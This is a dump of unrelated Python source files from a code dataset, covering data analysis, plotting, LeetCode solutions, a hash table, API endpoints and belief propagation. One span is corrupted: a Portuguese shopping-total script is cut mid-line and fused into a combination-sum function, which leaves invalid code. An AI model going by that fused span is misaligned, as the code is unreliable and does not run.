In[5]:\n\n\ndj.ERD(schema)\n\n\n# The different colors indicate different table types. Gray is lookup, green is manual, blue is Imported and red (which we will see below) is computed. This entity relationship diagram describes how data is ultimately organized in the relational database. The next step is the population of the database with data.\n\n# ## 2) Generate content for the database\n\n# The first think to enter into the databse are two experimenters, and their first experiment. With datajoint, we use the method .insert()\n\n# In[6]:\n\n\nExperiment().insert((['Angus',1],['John',1]), skip_duplicates = True)\n\n\n# In[7]:\n\n\nExperiment() #Shows the current content of the database\n\n\n# Now that we have two experiments defined, we can populate the datasets for the experiment. 
This is done with the .populate() command.\n\n# In[8]:\n\n\nSet().populate()\n\n\n# In[9]:\n\n\nSet() # Now there are two datasets in the database\n\n\n# In[10]:\n\n\nSet().DataPoint() # With a set of datapoints\n\n\n# One of the reasons that datajoint is popular is that it allows users to make SQL queries without even noticing it, e.g.\n\n# In[11]:\n\n\nExperiment() & 'username = \"Angus\"'\n\n\n# # 3) Compute in the database.\n\n# First, we add a new table to the database that fits a line\n\n# In[12]:\n\n\n@schema\nclass Fitparameters(dj.Computed):\n definition = \"\"\"\n # calculates the fitparameters\n -> Set\n -----\n slope : float\n offset: float\n \"\"\"\n def _make_tuples(self, key):\n data = (Set().DataPoint() & key)\n x, y = data.fetch('x','y')\n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n self.insert1(dict(key, slope = slope, offset = intercept))\n\n\n# Check that it appeared in the entity relationship diagram:\n\n# In[13]:\n\n\ndj.ERD(schema)\n\n\n# After the definition we can call the populate function and read out the results\n\n# In[14]:\n\n\nFitparameters().populate()\nFitparameters()\n\n\n# If you use a database management tool, like Sequel Pro, or you connect to the database, you should be able to see the data directly.\n\n# In[ ]:\n\n\n\n\n","sub_path":"problem_3/datajoint_example.py","file_name":"datajoint_example.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"329384027","text":"# Copyright 2012-2013 Pierre de Buyl\n#\n# This file is part of pyh5md\n#\n# pyh5md is free software and is licensed under the modified BSD license (see\n# LICENSE file).\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyh5md\n\n# Open a H5MD file\nf = pyh5md.H5MD_File('walk_1d.h5', 'r')\nf.check()\n\n# Open a trajectory group\npart = f.particles_group('particles')\n\n# Open trajectory position data element in the trajectory group\npart_pos = part.trajectory('position')\n\n# Get data and time\nr = part_pos.value\nr_time = part_pos.time\n\n# Compute the MSD\n# The sum over \"axis=2\" is over the spatial components of the positions\nmsd = ((r - r[0])**2).sum(axis=2)\n\n# Compute the mean and standard deviation (particle-wise)\nmsd_mean = msd.mean(axis=1)\nmsd_std = msd.std(axis=1)\n\n# Display the MSD and \nplt.plot(r_time, msd_mean, 'k-', label=r'$\\langle [{\\bf r}(t)-{\\bf r}(0)]^2\\rangle$')\nplt.plot(r_time, msd_mean+msd_std, 'k:', label=r'$\\langle [{\\bf r}(t)-{\\bf r}(0)]^2\\rangle \\pm \\sigma$')\nplt.plot(r_time, msd_mean-msd_std, 'k:')\nplt.xlabel(r'$t$')\nplt.xlabel(r'$t$')\nplt.legend()\n\n# Create a new figure\nplt.figure()\n\n# Obtain and plot the center_of_mass observable\nobs_com = f.observable('center_of_mass')\nplt.plot(obs_com.time, obs_com.value, 'k-')\nplt.xlabel(r'$t$')\nplt.ylabel(r'center of mass')\n\n# Close the file\nf.close()\n\nplt.show()\n","sub_path":"examples/random_walk_1d_analysis.py","file_name":"random_walk_1d_analysis.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"586539338","text":"print(' --- LOJAS ---')\ncont = 's'\nvalor = totalGasto = preAlto = totAlto = menor =contProduto = 0\nnomeMenor = ''\nwhile cont == 's':\n #Detalhes do produto\n nome = input('Descrição produto: ')\n valor = float(input('Valor: '))\n #Total Gasto\n totalGasto += valor\n contProduto += 1\n #Valores maior de 1.000,00\n if valor>1000:\n 
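# count items priced above 1000 and keep the highest such price seen\n        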
totAlto += 1\n if valor>preAlto:\n preAlto = valor\n #Menor preço do produto\n if contProduto ==1:\n menor = valor\n nomeMenor = nome\n elif valor List[List[int]]:\n def back(subset, start, target):\n if target<0:\n return \n elif target==0:\n res.append(subset[:])\n for i in range(start, len(nums)):\n subset.append(nums[i])\n back(subset, i, target-nums[i])\n subset.pop()\n \n res = []\n back([], 0, target)\n return res\n","sub_path":"39. Combination Sum.py","file_name":"39. Combination Sum.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"234448719","text":"import cv2\nimport numpy as np\n\ndef fill_square(grid,step,col,row,color):\n # Determine the corners\n left_x = (step + 1) * (col) + 1\n right_x = (step + 1) * (col + 1) - 1\n top_y = (step + 1) * (row) + 1\n bottom_y = (step + 1) * (row + 1) - 1\n\n corners = np.asarray(\n [(left_x, top_y),\n (right_x, top_y),\n (right_x, bottom_y),\n (left_x, bottom_y)]\n )\n\n # Fill in the central point\n cv2.fillConvexPoly(grid, corners, color)\n\n return grid\n\n\n# Parameters\njpg_offset_row = 3\njpg_offset_col = 6\n\nstep = 10\nout_size = 400\n\nline_color = (0, 255, 255)\ncenter_color = (0, 0, 255)\n\n# Initialize white background\ngrid = np.ones((step*8+9, step*8+9, 3), np.uint8)*255\n\n# Create the grid\nfor idx in range(9):\n ctr = (step+1)*idx\n grid[:, ctr] = 0\n grid[ctr, :] = 0\n\n# Fill line and column\nfor col in range(8):\n grid = fill_square(grid, step, col, jpg_offset_row, line_color)\nfor row in range(8):\n grid = fill_square(grid, step, jpg_offset_col, row, line_color)\n\n# Fill the center\ngrid = fill_square(grid, step, jpg_offset_col, jpg_offset_row, center_color)\n\ngrid = cv2.resize(grid, (out_size, out_size), interpolation=cv2.INTER_NEAREST)\n\ncv2.imshow('test', grid)\ncv2.waitKey(-1)","sub_path":"s1_fill_grid.py","file_name":"s1_fill_grid.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15535452","text":"# Chase Watson\n\nclass HashTable:\n def __init__(self):\n self.size = 256\n self.table = [[] for _ in range(self.size)]\n\n # For the hashing function, we get the ASCII value of each\n # character in the pair and mod that with the table size.\n # Since the Hash Table is initialized as a list of lists,\n # similar pairs would be mapped to the same entry in the table\n def _get_hash(self, key):\n hash = 0\n # To prevent 'be' and 'eb' from existing in the same sublist,\n # we grab the ASCII value of the first element in the string\n # and add it to the resulting hash value before it is modded\n temp = ord(key[0])\n for char in str(key):\n hash += ord(char)\n hash += temp\n return hash % self.size\n\n def add(self, key):\n # Get the index of the entry using the hash function\n key_hash = self._get_hash(key)\n key_value = [key]\n # Check to see if the cell in the table is empty or not\n if self.table[key_hash] is None:\n # Might make list of a list of a list here, might change\n self.table[key_hash] = list([key_value])\n return True\n else:\n # Collision handling done here\n # Check to see if items already in cell are same as current pair\n for value in self.table[key_hash]:\n # If true, append\n if key_value == value:\n self.table[key_hash].append(key_value)\n return True\n # If false, use linear probing to handle collisions\n else:\n entrySize = 0\n new_value = []\n\n # To prevent out-of-range errors\n if key_hash == 
self.size - 1:\n new_hash = 0\n else:\n new_hash = key_hash + 1\n\n # Get size of entry in hash table\n for i in self.table[new_hash]:\n entrySize += 1\n new_value = [i[0]]\n\n # Check if value within the entry at new_hash is the same as the current key_value\n if key_value == new_value:\n self.table[new_hash].append(key_value)\n return True\n\n # If next hash table entry is empty, insert\n elif entrySize == 0:\n self.table[new_hash].append(key_value)\n return True\n\n # Otherwise, we continue through hash table until we find a match or empty entry\n else:\n while entrySize != 0:\n entrySize = 0\n\n if new_hash == self.size - 1:\n new_hash = 0\n else:\n new_hash += 1\n\n for i in self.table[new_hash]:\n entrySize += 1\n new_value = [i[0]]\n\n if key_value == new_value:\n self.table[new_hash].append(key_value)\n return True\n\n self.table[new_hash].append(key_value)\n return True\n\n self.table[key_hash].append(key_value)\n return True\n\n def get(self, key):\n current = self.table[key]\n if current is not None:\n # Might not work properly, might change\n return current\n return None\n\n def delete(self, key, hash):\n if self.table[hash] is None:\n return False\n else:\n # Similar to append, might change if add doesn't work\n self.table[hash].pop()\n return True","sub_path":"Hash.py","file_name":"Hash.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159245961","text":"class Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n x = len(nums)\n if x == 0: return False\n i = 0\n rightb = 0\n while i <= rightb:\n rightb = max(rightb, nums[i]+i)\n i += 1\n if rightb >= len(nums)- 1:\n return True\n return False ","sub_path":"Python/leetcode.055.jump-game.py","file_name":"leetcode.055.jump-game.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"394315030","text":"from opendc.models.scenario import Scenario\nfrom opendc.models.portfolio import Portfolio\nfrom opendc.util.rest import Response\n\n\ndef GET(request):\n \"\"\"Get this Scenario.\"\"\"\n\n request.check_required_parameters(path={'scenarioId': 'string'})\n\n scenario = Scenario.from_id(request.params_path['scenarioId'])\n\n scenario.check_exists()\n scenario.check_user_access(request.google_id, False)\n\n return Response(200, 'Successfully retrieved scenario.', scenario.obj)\n\n\ndef PUT(request):\n \"\"\"Update this Scenarios name.\"\"\"\n\n request.check_required_parameters(path={'scenarioId': 'string'}, body={'scenario': {\n 'name': 'string',\n }})\n\n scenario = Scenario.from_id(request.params_path['scenarioId'])\n\n scenario.check_exists()\n scenario.check_user_access(request.google_id, True)\n\n scenario.set_property('name',\n request.params_body['scenario']['name'])\n\n scenario.update()\n\n return Response(200, 'Successfully updated scenario.', scenario.obj)\n\n\ndef DELETE(request):\n \"\"\"Delete this Scenario.\"\"\"\n\n request.check_required_parameters(path={'scenarioId': 'string'})\n\n scenario = Scenario.from_id(request.params_path['scenarioId'])\n\n scenario.check_exists()\n scenario.check_user_access(request.google_id, True)\n\n scenario_id = scenario.get_id()\n\n portfolio = Portfolio.from_id(scenario.obj['portfolioId'])\n portfolio.check_exists()\n if scenario_id in portfolio.obj['scenarioIds']:\n portfolio.obj['scenarioIds'].remove(scenario_id)\n portfolio.update()\n\n 
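# the portfolio no longer references the scenario, so it can now be deleted\n    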
old_object = scenario.delete()\n\n    return Response(200, 'Successfully deleted scenario.', old_object)\n","sub_path":"api/opendc/api/v2/scenarios/scenarioId/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"476987218","text":"\"\"\"\nProcess some integers.\n\nusage: 4_rc_file.py [-h] [--agg AGG] N [N ...]\n\npositional arguments:\n  N          an integer for the accumulator\n\noptional arguments:\n  -h, --help  show this help message and exit\n  --agg AGG   aggregation function [default: sum]\n\"\"\"\nfrom docopt import docopt\n\nimport os, json\n\ncli_arguments = docopt(__doc__, version='Utility 20.0')\n\n# Implement rc file\nrc_file_name = \".foorc\"\nrc_arguments = {}\nif os.path.exists(rc_file_name):\n    print(f\"Loading runtime config from {rc_file_name} file\")\n    with open(rc_file_name) as f:\n        rc_arguments = json.load(f)\nelse:\n    print(f\"Locally you can use a {rc_file_name} file to avoid typing all flags and arguments every time\")\n    print(f\"Simply copy the following config to {rc_file_name} to get started\")\n    print(cli_arguments)\n\n## Most basic merge strategy (it can be naive in some cases)\narguments = {**cli_arguments, **rc_arguments}\nprint(arguments)","sub_path":"example_build_better_cli/4_rc_file.py","file_name":"4_rc_file.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32183749","text":"import copy\n\nfrom infra import timing, stored_animations\nfrom led_objects.objects_selector import get_elements\n\n\nclass Animation:\n\n    def __init__(self):\n        self.timing = None\n        self.repeat_params = None\n        if stored_animations.is_recording():\n            self.repeat_params = stored_animations.get_recording_timing()\n        else:\n            self.set_timing()\n        self.segments = None\n        self.stored_elements = None\n\n    def to_json_obj(self):\n\n        json_obj = {\n            \"t\": self.name,\n            \"p\": self.segments if len(self.segments) != 1 else self.segments[0],\n            \"s\": self.timing.get_start_time_ms(),\n            \"e\": self.timing.get_end_time_ms(),\n            \"params\": self.get_params_json()\n        }\n\n        if self.timing.repeats:\n            json_obj[\"rep_s\"] = self.timing.get_cycle_beat_rel_start()\n            json_obj[\"rep_e\"] = self.timing.get_cycle_beat_rel_end()\n            json_obj[\"rep_num\"] = self.timing.repeats\n\n        if self.repeat_params:\n            total_beats = self.timing.number_of_beats()\n            curr_length_in_beats = self.repeat_params[\"curr_length_beats\"]\n            if not curr_length_in_beats:\n                curr_length_in_beats = total_beats\n            json_obj[\"rep_s\"] = self.repeat_params[\"repeat_start_beat\"] / float(curr_length_in_beats)\n            json_obj[\"rep_e\"] = self.repeat_params[\"repeat_end_beat\"] / float(curr_length_in_beats)\n            num_repeat = total_beats / curr_length_in_beats\n            json_obj[\"rep_num\"] = num_repeat\n        return json_obj\n\n    def set_timing(self):\n        \"\"\" capture the current timing \"\"\"\n        self.timing = timing.get_timing()\n\n    def apply(self):\n\n        elements_to_apply = get_elements() if not self.stored_elements else self.stored_elements\n        if stored_animations.is_recording():\n            self.stored_elements = elements_to_apply\n            stored_animations.store_animation(self)\n        else:\n            if not elements_to_apply:\n                raise Exception(\"animation has no led objects to take effect on\")\n\n            leds_segment = {}\n            for segment_proxy in elements_to_apply:\n                if segment_proxy.led_object not in leds_segment:\n                    leds_segment[segment_proxy.led_object] = []\n                
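# bucket every selected segment under its parent LED object\n                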
leds_segment[segment_proxy.led_object].append(segment_proxy.segment_name)\n\n for led_object, segments in leds_segment.items():\n self.segments = segments\n led_object.add_for_segment(segments, copy.deepcopy(self))\n\n def create_from_template(self):\n self.timing = timing.get_timing()\n self.apply()","sub_path":"animations/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"391397041","text":"sArr = [\"aabbaccc\",\n \"ababcdcdababcdcd\",\n \"abcabcdede\",\n \"abcabcabcabcdededededede\",\n \"xababcdcdababcdcd\"]\n\n# s = sArr[0]\n# unit = int(len(s)/2)\n# unit\n# prev = s[0:unit]\n# prev\n# curr = s[unit : unit + unit]\n# prev == curr\n\n# s = sArr[4]\n# unit = int(len(s)/2)\n# unit\n# prev = s[0:unit]\n# prev\n# curr = s[unit : unit + unit]\n# prev == curr\n# prev = s[1:unit + 1]\n# prev\n# curr = s[unit + 1: unit + unit + 1]\n# curr\n# prev == curr\n\n[i for i in range(0, 7, 3)]\n\ns = sArr[4]\nunit = int(len(s)/2)\nunit\n\nlen(s) - 2 * unit\n[i for i in range(0, len(s) - 2 * unit + 1, 1) ]\n\nfor i in range(0, len(s) - 2 * unit + 1, 1) :\n prev = s[0 + i : unit + i]\n curr = s[unit + i : unit * 2 + i]\n unit if prev == curr else None\n\ns = sArr[3]\ns\nhalf = int(len(s)/2)\nhalf\n\nfor i in range(half, 0, -1):\n unit = i\n cnt = 0\n for j in range(0, len(s) - unit * 2 + 1, unit) :\n start = j\n for k in range(0, len(s) % unit + 1, 1):\n shift = k\n prev = s[start + shift: start + shift + unit]\n prev1 = (start + shift, start + shift + unit)\n curr = s[start + shift + unit: start + shift + unit * 2 ]\n curr1 = (start + shift + unit, start + shift + unit * 2)\n 'prev, curr = ({}, {})'.format(prev1, curr1)\n 'prev, curr = ({}, {})'.format(prev, curr)\n cnt = cnt + 1 if prev == curr else 0\n '{}, {}'.format(curr, cnt + 1) if cnt != 0 else None\n\n\n\n[i for i in range(half, 0, -1)]\nlen(s)\nunit = 10\n[j for j in range(0, len(s) % unit, 1)]\nshift = 4\n[(k, k + unit) for k in range(0 + shift, len(s) - unit + 1, unit)]\n\n\n\n[(r, r + 2) for r in range(0, len(\"abcabcabcabc12dczczczcz\"), 2)][0]\nr = [7, 9, 8, 14, 7]\n\ns[0]\ns[1]\ns[2]\ns[3]\ns[4]\n\n# [관찰된 사실]\n# aabbccdd => 2a2b2c2d : 연속된 2개의 문자열은 압축 효과 없음\n# aaabbcc => 3a2b2c : 적어도 3개 이상의 문자열이 연속되어야 압축 효과 있음\n# aaabbbaaabbb => 3a3b3a3b (x) / 2aaabbb (o) : 연속된 문자열의 길이가 길수록 압축 효과가 큼\n\n# [순회방법]\n\n\n# int는 소수점 자리수를 버림\n\n\nword = s[0]\nlen(word)\n\nif len(word) % 2 == 0:\n half = int(len(word)/ 2)\n\nhalf\n\nword = word[0:half]\nword\n","sub_path":"2019-2020_programmers/_03_/src/python/string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"558637897","text":"\"\"\"\\\nwxListBox widget configuration\n\n@copyright: 2014-2016 Carsten Grohmann\n@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY\n\"\"\"\n\nconfig = {\n 'wxklass': 'wxListBox',\n 'style_defs': {\n 'wxLB_SINGLE': {\n 'desc': _('Single-selection list.'),\n 'exclude': 'wxLB_EXTENDED|wxLB_MULTIPLE',\n },\n 'wxLB_MULTIPLE': {\n 'desc': _('Multiple-selection list: the user can toggle multiple '\n 'items on and off. 
This is the same as wxLB_EXTENDED '\n 'in wxGTK2 port.'),\n 'exclude': 'wxLB_EXTENDED|wxLB_SINGLE',\n },\n 'wxLB_EXTENDED': {\n 'desc': _('Extended-selection list: the user can extend the '\n 'selection by using SHIFT or CTRL keys together with '\n 'the cursor movement keys or the mouse.'),\n 'exclude': 'wxLB_SINGLE|wxLB_MULTIPLE',\n },\n 'wxLB_HSCROLL': {\n 'desc': _('Create horizontal scrollbar if contents are too wide '\n '(Windows only).'),\n },\n 'wxLB_ALWAYS_SB': {\n 'desc': _('Always show a vertical scrollbar.'),\n },\n 'wxLB_NEEDED_SB': {\n 'desc': _('Only create a vertical scrollbar if needed.'),\n },\n 'wxLB_NO_SB': {\n 'desc': _(\"Don't create vertical scrollbar (wxMSW only).\"),\n 'supported_by': ('wx3',),\n },\n 'wxLB_SORT': {\n 'desc': _('The listbox contents are sorted in alphabetical order.')\n },\n },\n 'default_style': 'wxLB_SINGLE',\n 'style_list': ['wxLB_SINGLE', 'wxLB_MULTIPLE', 'wxLB_EXTENDED',\n 'wxLB_HSCROLL', 'wxLB_ALWAYS_SB', 'wxLB_NEEDED_SB',\n 'wxLB_NO_SB', 'wxLB_SORT'],\n 'events': {\n 'EVT_LISTBOX': {},\n 'EVT_LISTBOX_DCLICK': {},\n },\n}\n\n\n\n","sub_path":"widgets/list_box/wconfig.py","file_name":"wconfig.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"370161955","text":"import tensorflow as tf\r\n\r\na = tf.placeholder(\"float\")\r\nb = tf.placeholder(\"float\")\r\nadd_op = tf.add(a, b)\r\nmul_op = tf.multiply(a, b)\r\nadd_op1 = a + b\r\nmul_op1 = a * b\r\n\r\noutput_array = [[add_op, mul_op]]\r\n\r\nwith tf.Session() as sess:\r\n output_array = sess.run(output_array, feed_dict={a: 1, b: 2})\r\n print(output_array)\r\nprint ()","sub_path":"samples-labs-exercises/samples/neurons/yc/tiger_tensorboard_log1.py","file_name":"tiger_tensorboard_log1.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"263482641","text":"\"\"\"For generating plots from simulation data\"\"\"\n\n#Standard library\nfrom __future__ import print_function, division #Python 2 compatibility\nimport os\nimport os.path as osp\nimport sys\n\n#Site packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#Local\nimport folderstructure as FS\nimport common\nimport simulator_general\nimport collect_results\n\nclass PlotSeries(common.ParameterSet):\n \"\"\"Data for a single series on a plot\n\n Attributes:\n\n - xvals = array of x-values\n - yvals = array of y-values\n - label = legend label\n - metadata = other parameters needed to identify the data series\n \"\"\"\n __slots__=['xvals','yvals','label','metadata']\n def add_to_axes(self,ax,fmt,**kwd):\n \"\"\"Plot this series on the specified axes\n\n This is a wrapper for ax.plot\n\n Arguments:\n\n - ax = matplotlib Axes object\n - fmt = matplotlib format string\n - \\**kwd = other keyword arguments for Axes.plot\n\n Returns:\n\n - The result of call to ax.plot\"\"\"\n return ax.plot(self.xvals,self.yvals,fmt,label=self.label,**kwd)\n\nclass PlotFigure(common.ParameterSet):\n \"\"\"Data for a single matplotlib figure\n\n This is for a plot with a single set of axes.\n\n Attributes:\n\n To be read in from yaml file:\n\n - figsize = pair of numbers representing figure size, in inches: (Width, Height)\n - filename = name of the output file to be created, as string\n - prepfunctions = sequence of method calls used to generate additional data, etc.\n\n The available method names usually start with 'prep_'\n\n - plotfunctions = 
sequence of method calls used to generate plot\n\n The available method names usually start with 'plot_'\n\n - xlabel = x-axis label, as string\n - ylabel = y-axis label, as string\n - title = plot title, as string\n - fmts = list of format specifier strings\n\n To be created by methods:\n\n - datafiles = dictionary of loaded data files\n - outfpath = path to output file\n - series = sequence of PlotSeries instances\n - fig = matplotlib Figure for the generated plot\n - ax = matplotlib Axes for the plot\n - info = dictionary of miscellaneous data\"\"\"\n __slots__=['figsize','filename','prepfunctions','plotfunctions','xlabel','ylabel','title','fmts','outfpath','datafiles','series','fig','ax','info']\n _config_attrs=['figsize','filename','prepfunctions','plotfunctions','xlabel','ylabel','title','fmts']\n _outputfile_attrs=['outfpath']\n _taskname_src_attr='outfpath'\n \n def __init__(self,**kwd):\n #Initialization from base class\n super(PlotFigure, self).__init__(**kwd)\n #Find the input and output files\n self.locate_data()\n self.outfpath=osp.join(self.outdir(),self.filename)\n\n @property\n def _more_inputfiles(self):\n return list(self.datafiles.values())\n \n def execute_commandseq(self,attrname):\n \"\"\"Execute the command sequence\n\n Arguments:\n\n - attrname = name of attribute containing the command sequence\"\"\"\n if getattr(self,attrname,None) is not None:\n for cmd in getattr(self,attrname,[]):\n #Function name and arguments\n funcname, kwargs = cmd\n #Call it\n try:\n getattr(self,funcname)(**kwargs)\n except Exception as einst:\n print(\"Exception occurred for command: %s\"%str(cmd), file=sys.stderr)\n raise einst\n \n def run(self):\n \"\"\"Create the plot.\"\"\"\n print(self.outfpath)\n \n #Load the data we need to generate the plot\n self.load_data()\n \n #Initialize the figure at the size requested\n self.fig = plt.figure(figsize=self.figsize)\n \n #Get the axes\n self.ax=self.fig.gca()\n \n #Call the preparation functions\n self.execute_commandseq('prepfunctions')\n \n #Add the available series to the axes\n self.plot_basic_series()\n \n #Call the requested plot functions\n self.execute_commandseq('plotfunctions')\n \n #Save the figure\n if not osp.isdir(self.outdir()):\n os.makedirs(self.outdir())\n self.fig.savefig(self.outfpath)\n \n #Close the figure\n plt.close(self.fig)\n \n #Done\n return\n\n def plot_basic_series(self):\n \"\"\"A simple plot.\"\"\"\n for i,sr in enumerate(self.series):\n o=sr.add_to_axes(self.ax,self.fmts[i])\n if getattr(self,'title',None) is not None:\n o=self.ax.set_title(self.title)\n if getattr(self,'xlabel',None) is not None:\n o=self.ax.set_xlabel(self.xlabel)\n if getattr(self,'ylabel',None) is not None:\n o=self.ax.set_ylabel(self.ylabel)\n return \n\n def plot_axmethod(self,method,kwargs=None):\n \"\"\"Call a method of the axes.\n\n Arguments:\n\n - method = name of Axes method to call, as string\n - kwargs = arguments dictionary for the method\"\"\"\n f=getattr(self.ax,method)\n if kwargs is None:\n kwargs = {}\n f(**kwargs)\n return\n\n def plot_hline(self,locspec,kwargs=None):\n \"\"\"Add a horizontal line with a value from info\n\n Arguments:\n\n - locspec = sequence of keys in the info dictionary to locate the y-value\n - kwargs = keyword arguments for ax.axhline\"\"\"\n yval=common.nested_location(self.info,locspec)\n if kwargs is None:\n kwargs = {}\n self.ax.axhline(yval,**kwargs)\n return\n\n def plot_vline(self,locspec,kwargs=None):\n \"\"\"Add a vertical line with a value from info\n\n Arguments:\n\n - locspec = sequence of keys in the info dictionary to locate the x-value\n - kwargs = keyword arguments for ax.axvline\"\"\"\n xval=common.nested_location(self.info,locspec)\n if kwargs is None:\n kwargs = {}\n self.ax.axvline(xval,**kwargs)\n return\n\n\nclass ModelPlotFigure(PlotFigure):\n \"\"\"Data for a single model plot\n\n Attributes:\n\n To be read in from yaml file:\n\n - plotname = plot name in outdata file holding data series\n - modelname = name of model\n\n To be created by methods:\n\n (none)\"\"\"\n __slots__=['plotname','modelname']\n _config_attrs=PlotFigure._config_attrs+['plotname','modelname']\n\n def outdir(self):\n return osp.join(FS.postprocfolder,self.basename,self.modelname)\n\n def datadir(self):\n return osp.join(FS.solnfolder,self.basename,self.modelname)\n\n def locate_data(self):\n datadir=self.datadir()\n self.datafiles={'pklfile':osp.join(datadir,'outdata.pkl'), 'infofile':osp.join(datadir,FS.infofile)}\n\n def load_data(self):\n \"\"\"Load the data for the plot.\"\"\"\n \n #Load the data series\n outdata=simulator_general.OutData.from_pickle(self.datafiles['pklfile'])\n self.series=outdata.plots[self.plotname]\n \n #Load the info\n self.info=common.readyaml(self.datafiles['infofile'])\n \n return\n\nclass CollectionPlotFigure(PlotFigure):\n \"\"\"Data for a single collection plot\n\n Attributes:\n\n To be read in from yaml file:\n\n - calcfunctions = sequence of calculation functions to be called before generating plot\n - seriesdefs = sequence of series definitions (xcol, ycol, label, query),\n where the columns specify the DataFrame columns containing values for the series.\n The label and the query (a DataFrame query string) are optional.\n\n To be created by methods:\n\n - df = the DataFrame\"\"\"\n __slots__=['calcfunctions','seriesdefs','df']\n _config_attrs=PlotFigure._config_attrs+['calcfunctions','seriesdefs']\n\n def outdir(self):\n return osp.join(FS.postprocfolder,self.basename)\n\n def locate_data(self):\n self.datafiles={'dataframe': osp.join(FS.postprocfolder,self.basename,collect_results.collected_df_fname)}\n\n def load_data(self):\n \"\"\"Load the data for the plot.\"\"\"\n #Load the DataFrame\n self.df=pd.read_pickle(self.datafiles['dataframe'])\n \n #Initialize empty info\n self.info={}\n \n #Do the requested calculations to add new columns\n self.execute_commandseq('calcfunctions')\n \n #Add the requested columns in as series\n self.series=[]\n for sdef in self.seriesdefs:\n assert len(sdef) >= 2, \"Inadequate series definition: %s\"%str(sdef)\n if len(sdef)>3 and len(sdef[3])>0:\n qdf=self.df.query(sdef[3])\n else:\n qdf=self.df\n sdef_dict={'xvals':qdf[sdef[0]],'yvals':qdf[sdef[1]]}\n if len(sdef)>2:\n sdef_dict['label']=sdef[2]\n else:\n sdef_dict['label']=''\n self.series.append(PlotSeries(**sdef_dict))\n \n return\n\n def calc_Dratio(self):\n def calc_ratio(row):\n return row['Deff']/row['D_bulk']\n self.df['ratio_D']=self.df.apply(calc_ratio,axis=1)\n return\n\n def prep_series_equality(self):\n pdser=self.df['free_volume_frac']\n vals=[pdser.min(),pdser.max()]\n ser=PlotSeries(xvals=vals,yvals=vals,label=\"1:1\")\n self.series.append(ser)\n return","sub_path":"NSF/Tom/src/plotdata.py","file_name":"plotdata.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"124816836","text":"import numpy as np\n\n\ndef ep(edge_potential, i, j, var_i, var_j):\n if (i, j) in edge_potential:\n return edge_potential[(i, j)][var_i, var_j]\n elif (j, i) in edge_potential:\n return edge_potential[(j, i)][var_j, var_i]\n else:\n 
return None\n\n\ndef get_msg(i, j, node_potential, edge_potential, messages, neighbors, normalize=True):\n # get msg_{i->j}(var)\n distant_msg = {0: 1, 1: 1}\n for k in neighbors[i]:\n if k != j:\n distant_msg[0] *= messages[(k, i)][0]\n distant_msg[1] *= messages[(k, i)][1]\n\n msg = {}\n msg[0] = node_potential[i][0] * ep(edge_potential, i, j, 0, 0) * distant_msg[0] \\\n + node_potential[i][1] * ep(edge_potential, i, j, 1, 0) * distant_msg[1]\n msg[1] = node_potential[i][0] * ep(edge_potential, i, j, 0, 1) * distant_msg[0] \\\n + node_potential[i][1] * ep(edge_potential, i, j, 1, 1) * distant_msg[1]\n\n if normalize:\n s = msg[0] + msg[1]\n msg[0] /= s\n msg[1] /= s\n\n return msg\n\n\ndef normalize_marginals(marginals):\n for node in marginals:\n p_sum = marginals[node][0] + marginals[node][1]\n marginals[node][0] /= p_sum\n marginals[node][1] /= p_sum\n\n\ndef belief_propagation(node_potential, edge_potential, diameter=np.inf):\n '''\n node_potential: {i -> node_potential}\n edge_potential: {(i, j) -> edge_potential}\n output: {i -> marginal}\n '''\n \n # find neighbor nodes for each node\n neighbors = {}\n for i in node_potential:\n neighbors[i] = set()\n for (i, j) in edge_potential:\n neighbors[i].add(j)\n neighbors[j].add(i)\n\n # initialize random message\n messages = {}\n init_msg = {0: 1, 1: 1}\n for (i, j) in edge_potential:\n messages[(i, j)] = init_msg\n messages[(j, i)] = init_msg\n\n diam = min(diameter, len(node_potential))\n\n # tree diameter <= total number of nodes\n for _ in range(diam):\n new_messages = {}\n for i in node_potential:\n for j in neighbors[i]:\n msg = get_msg(\n i, j,\n node_potential,\n edge_potential,\n messages,\n neighbors)\n new_messages[(i, j)] = msg\n assert len(new_messages) == len(messages)\n messages = new_messages\n\n # compute marginals\n marginals = {}\n for i in node_potential:\n marginals[i] = {}\n msg = {0: 1, 1: 1}\n for j in neighbors[i]:\n msg[0] *= messages[(j, i)][0]\n msg[1] *= messages[(j, i)][1]\n marginals[i][0] = 